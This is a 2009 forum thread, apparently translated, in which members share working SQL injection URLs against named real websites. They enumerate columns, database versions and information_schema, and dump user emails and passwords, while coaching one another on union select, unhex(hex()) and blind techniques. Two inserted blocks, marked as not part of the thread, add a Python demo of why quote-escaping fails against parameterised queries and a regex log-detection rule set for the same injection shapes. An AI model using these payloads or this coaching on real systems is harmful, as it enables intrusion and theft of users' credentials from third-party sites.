redking, posted February 1, 2009:
Which site with the largest number of columns have you caught? And how many?

redking, posted February 2, 2009:
http://www.e-juridic.ro/index.php?pag=show_prod&pid=1+union+all+select+1,concat(userid,0x3a,id,0x3a,email,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+user

redking, posted February 2, 2009:
http://www.physikinstrumente.com/en/news/fullnews.php?newsid=1+union+all+select+1,2,3,concat(username,0x3a,password),5,6,7+from+user

Flubber (Author), posted February 9, 2009:
Can you manage to find out anything more from this site (http://www.luccatourist.it/notizie.php?id=230)?
I only managed to get the version:
http://www.luccatourist.it/notizie.php?id=-230+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--
If you can get more... post it. Thx

Guest Praetorian, posted February 9, 2009:
> Can you manage to find out anything more from this site (http://www.luccatourist.it/notizie.php?id=230)?
> I only managed to get the version:
> http://www.luccatourist.it/notizie.php?id=-230+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--
> If you can get more... post it. Thx
If you had found the version, you would have figured out what to do!!
You would have used unhex(hex(version()))
[Database] aptlucca
[Tables of DB]
[columns of utenti]
[ Email , Password ]

redking, posted February 9, 2009:
How did you guess the table names? With some program, right?

paxnWo, posted February 9, 2009:
The version is 5:
http://www.luccatourist.it/notizie.php?id=-230+union+all+select+1,2,unhex(hex(@@version)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--
That means we have information_schema.

redking, posted February 9, 2009:
> The version is 5:
> http://www.luccatourist.it/notizie.php?id=-230+union+all+select+1,2,unhex(hex(@@version)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--
> That means we have information_schema.
Yes paxnWo, I know that... but I don't know how to extract the tables manually from information_schema...
Later edit: I read up on it and learned how to extract the data manually from information_schema... it gets tougher if magic_quotes show up...

redking, posted February 10, 2009:
What I've been racking my brain over ---->
the raw material:
http://www.luccatourist.it/notizie.php?id=-1+union+all+select+1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+information_schema.columns+where+table_schema=0x6170746c75636361+and+table_name=0x7574656e7469
and the finished product:
http://www.luccatourist.it/notizie.php?id=-1+union+all+select+1,2,unhex(hex(group_concat(email,0x3a,password))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+utenti

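Added example, not part of the thread: the requests quoted above contain no quote characters (numeric `id` parameter, hex literals such as 0x3a), so quote-escaping of the magic_quotes kind does not protect a query built by string concatenation, while integer validation plus a bound parameter does. The sketch uses Python's sqlite3 in place of the PHP/MySQL stack; the schema contents and the helpers `escape_quotes`, `fetch_concat` and `fetch_bound` are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    """Constructed stand-in schema: a news table and a users table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE notizie (id INTEGER, titolo TEXT, testo TEXT);
        CREATE TABLE utenti (email TEXT, password TEXT);
        INSERT INTO notizie VALUES (230, 'Titolo', 'Testo');
        INSERT INTO utenti VALUES ('user@example.invalid', 'constructed-secret');
    """)
    return db

def escape_quotes(value):
    """Backslash-escape quotes and backslashes, as magic_quotes_gpc/addslashes did."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')

def fetch_concat(db, raw_id):
    """Vulnerable: the escaped value is pasted into a numeric context."""
    sql = "SELECT id, titolo, testo FROM notizie WHERE id = " + escape_quotes(raw_id)
    return db.execute(sql).fetchall()

def fetch_bound(db, raw_id):
    """Hardened: accept only digits, then bind the value as a parameter."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, titolo, testo FROM notizie WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

# Same shape as the thread's requests, and quote-free, so escaping changes nothing.
PAYLOAD = "-1 union all select 1, email, password from utenti"

if __name__ == "__main__":
    db = make_db()
    print(fetch_concat(db, "230"))      # normal request
    print(fetch_concat(db, PAYLOAD))    # a row from utenti comes back instead
    try:
        fetch_bound(db, PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```
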
Flubber (Author), posted February 11, 2009:
> If you had found the version, you would have figured out what to do!!
> You would have used unhex(hex(version()))
Sorry, I forgot to replace a (vulnerable) digit in the link with unhex(hex(@@version))
> Yes paxnWo, I know that... but I don't know how to extract the tables manually from information_schema...
Exactly the same, when I tried to read "information_schema.schemata" it gave me an error.

redking, posted February 11, 2009:
http://www.saints.co.nz/players.php?id=1+and+substring(@@version,1,1)=4
...I made many attempts to find the users table, but to no avail...

brugner, posted February 14, 2009:
Hello,
A bit of help if possible...
After queries like "union all select 1" (I checked with order by.. there is only one column) it only returns "The used SELECT statements have a different number of columns".
Does anyone know what this is about?

redking, posted February 14, 2009:
That means you haven't found the correct number of columns... rather than trying with order by... better try "union+all+select+1,2,3,...." and keep adding until you see it no longer gives you the error like "the selected statement....."... it shows you something else... if you don't understand, send me a PM with your ID... and I'll help you....

brugner, posted February 14, 2009:
> That means you haven't found the correct number of columns... rather than trying with order by... better try "union+all+select+1,2,3,...." and keep adding until you see it no longer gives you the error like "the selected statement....."... it shows you something else... if you don't understand, send me a PM with your ID... and I'll help you....
Thanks a lot for the help... before I got "enlightened" they patched the problem...

Guest Praetorian, posted February 14, 2009:
On most SQL-vulnerable sites.. if it shows you one thing at order by 1-- and something different at order by 2--, it means it has only 1 column.
Your link, for example, is:
index.php?id=12 union all select 1--
It may return nothing, or the normal error.
Instead of 1 you put [ version() ]; even if it doesn't show up, look in the page source.
If you don't find it there either, put a " - " in front of 12.
index.php?id=-12 union all select 1--
If it still doesn't work, you have to use unhex(hex(version()))
e.g.:
index.php?id=-12 union all select unhex(hex(version()))--
If it still doesn't work, it means you can't use sqli and you have to do blind sqli.

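Added example, not part of the thread: the request shapes discussed in these posts (order by N probing, union all select with a column list, version() wrapped in unhex(hex()), information_schema reads, hex-literal names, substring() comparisons) leave recognisable traces in web server access logs. The rule set, rule names and request lines below are constructed for illustration and would need tuning against real traffic.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# One pattern per query shape quoted in the thread (rule names are hypothetical).
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "column_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "version_probe": re.compile(r"@@version|\bversion\s*\(", re.I),
    "unhex_hex_wrap": re.compile(r"\bunhex\s*\(\s*hex\s*\(", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "hex_literal": re.compile(r"\b0x(?:[0-9a-f]{2})+\b", re.I),
    "boolean_blind": re.compile(r"\band\s+substring\s*\(", re.I),
}

def classify(request_line):
    """Return the rule names matched by the decoded query string of a request line."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return []
    query = unquote_plus(urlsplit(parts[1]).query)  # '+' and %xx become plain text
    return [name for name, rx in RULES.items() if rx.search(query)]

def scan(lines):
    """Map each request line with at least one hit to its list of rule names."""
    return {line: hits for line in lines if (hits := classify(line))}

# Constructed request lines modelled on the shapes in the posts above.
SAMPLE = [
    "GET /notizie.php?id=230 HTTP/1.1",
    "GET /notizie.php?id=230+order+by+41-- HTTP/1.1",
    "GET /notizie.php?id=-230+union+all+select+1,2,unhex(hex(@@version)),4-- HTTP/1.1",
    "GET /players.php?id=1+and+substring(@@version,1,1)=4 HTTP/1.1",
    "GET /notizie.php?id=-1+union+all+select+1,group_concat(column_name),3"
    "+from+information_schema.columns+where+table_name=0x7574656e7469 HTTP/1.1",
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE).items():
        print(", ".join(hits), "<-", line)
```
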
redking, posted February 14, 2009:
You can make a great many attempts on a vulnerable SQL... I've found many differences in how the queries are approached... anyway... glad you solved the problem....